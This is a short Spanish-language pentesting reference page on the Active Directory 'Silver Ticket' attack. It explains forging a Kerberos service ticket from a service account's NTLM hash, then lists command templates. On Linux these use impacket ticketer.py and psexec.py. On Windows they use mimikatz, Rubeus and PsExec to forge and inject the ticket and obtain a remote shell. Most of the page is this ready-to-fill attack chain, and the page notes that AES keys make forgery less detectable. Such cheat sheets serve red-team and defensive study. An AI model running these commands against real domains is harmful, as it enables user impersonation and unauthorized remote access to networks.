Silver Ticket

Silver Ticket

El Silver Ticket implica la explotación de tickets de servicio en entornos Active Directory (AD). Este método se basa en adquirir el hash NTLM de una cuenta de servicio , como una cuenta de equipo, para falsificar un ticket de Ticket Granting Service ticket (TGS). Con este ticket falsificado, un atacante puede acceder a servicios específicos de la red, haciéndose pasar por cualquier usuario y, por lo general, con el objetivo de obtener privilegios administrativos. Se enfatiza que el uso de claves AES para falsificar boletos es más seguro y menos detectable.

Para Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Para Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Referencia

Last updated